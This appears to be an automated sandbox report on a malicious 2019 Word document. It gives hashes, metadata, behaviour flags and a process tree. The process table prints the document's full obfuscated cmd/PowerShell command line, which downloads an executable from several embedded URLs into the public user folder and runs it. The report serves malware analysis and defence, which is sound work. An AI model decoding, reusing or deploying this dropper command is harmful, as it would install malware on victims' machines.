analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | FA038071_36.doc |
| Full analysis: | https://app.any.run/tasks/f926a029-4eef-47df-ac53-87e09c19ed7d |
| Verdict: | Malicious activity |
| Analysis date: | January 17, 2019, 16:10:08 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 16 11:40:00 2019, Last Saved Time/Date: Wed Jan 16 11:40:00 2019, Number of Pages: 1, Number of Words: 13, Number of Characters: 80, Security: 0 |
| MD5: | 8CF1ECA3CE29415BBBDC9402F0081193 |
| SHA1: | F28F29965C0735D240FC281842DE779EFD52CA7E |
| SHA256: | F2D9DD503F6F96EBE5E0CD82B1F035E3321A2A8EFD1EDDEB126386DC73071312 |
| SSDEEP: | 768:KVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFB3MB4zy2Gf37mYCp4DXUyZpOGanwrQ:Kocn1kp59gxBK85fBU4oXAwohX+a95 |
MALICIOUS
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2960)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2960)
SUSPICIOUS
Starts CMD.EXE for commands execution
- cmd.exe (PID: 1512)
- cmd.exe (PID: 2688)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2960)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2019:01:16 11:40:00 |
| ModifyDate: | 2019:01:16 11:40:00 |
| Pages: | 1 |
| Words: | 13 |
| Characters: | 80 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 92 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
35
Monitored processes
4
Malicious processes
1
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA038071_36.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 1512 | "C:\Windows\system32\cmd.exe" /c %pROgRaMdATA:~0,1%%PrOgrAMDATa:~9,2% /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2688 | CmD /V:On /r" Set 6bsD=p.w^%PUBLI`c~5,1^%\^%SESSIONNAMEc~-4,1^%h^%_EMPc~-3,1^%ll $NZGti.nZGl9l='?.9ileli';$_unisiZGwi=new-.9je[t Net:We9`lient;$.liveuws='httpc//www:.desZGg\.up:[.?/[6f#hPN7@httpc//ev.queZG\t:[.?/Wk0MdRvGuwW@httpc//lept.ku\t.sis:[.?/w?K5ZKF?inG@httpc//?i?iZG9ne\:[.?/tvp\RKd_@httpc//kids-edu[ZGti.n-supp.\t:[.?/ZKFuwlOlfNSSF':Split('@');$s[he?ZGsiw='UsZG9ilityuws';$Isleiw = '420';$v.\tZGlsluw='vi\tuZGlsf';$Av.n9j=$envcpu9li[+']'+$Isleiw+':exe';f.\eZG[h($Est.niZGll in $.liveuws){t\y{$_unisiZGwi:4w.wnl.ZGdFile($Est.niZGll, $Av.n9j);$input\d='PennsylvZGniZGfq';If ((Get-Ite? $Av.n9j):length -ge 80000) {Inv.ke-Ite? $Av.n9j;$B.\de\swp='?.9ileZGk';9\eZGk;}}[ZGt[h{}}$?eth.d.l.gyZGp='we9\eZGdinessfu';& sEt vkp=!6bsD:.=o!&& sEt Db=!vkp:uw=z!& SEt wzu=!Db:ZG=a!& seT 8d=!wzu:6=J!& SeT lJ=!8d::=.!&& SET f4=!lJ:c=:!&& seT 9R=!f4:[=c!&seT HFMG=!9R:#=6!&& seT mAj9=!HFMG:_=T!&&SET ZxJC=!mAj9:?=m!&& SeT Hwk=!ZxJC:ZKF=X!& SeT w6=!Hwk:4w=D!&SET Lv=!w6:9=b!&& SET jI5Q=!Lv:\=r!&sEt DR=!jI5Q:`=C!& SET QcHS=!DR:]=\!&& eChO %QcHS% | %comMONpROgrAMFIlEs(x86):~-12,1%MD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 2912 | C:\Windows\system32\cmd.exe /S /D /c" eChO %QcHS% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
Total events
1 146
Read events
750
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
0
Text files
0
Unknown types
5
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A53.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1E036D8.wmf | — | |
MD5:— | SHA256:— | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18133AA6.wmf | — | |
MD5:— | SHA256:— | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32841B73.wmf | wmf | |
MD5:FC787222CE5B4CC4CAD31B79C3C2348E | SHA256:8B5397118F6F9D1330C73A0521108988C59B8AB9BCF5EE338E33D31C5BBE2F40 | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1B84F0A1AFEC87D3E9E83E2516DB2C05 | SHA256:40104F2ADA402B8D951EDCD19C89BAF1CE31B9A2D90D9E6710F802A6D36CB678 | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2954D8F9.wmf | wmf | |
MD5:93013C6316D4E5D6EE9BACF397F33F66 | SHA256:DDCF968B3B04613F8FAF4053101917730B3F178AD41789532825800D2252C10B | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BC13428CFD31803E5B75170C0D0A7654 | SHA256:FCBC2FB83DF67AEB60AB757738926CBBE08077FB09E0DD80BDFE878E3FAA2307 | |||
| 2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$038071_36.doc | pgc | |
MD5:0AD43E699F724C4573EDBA6688FEAD9A | SHA256:14D0BC9810405D139D012E614CB24AD3F06EDB76501308103A8221937EE54932 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report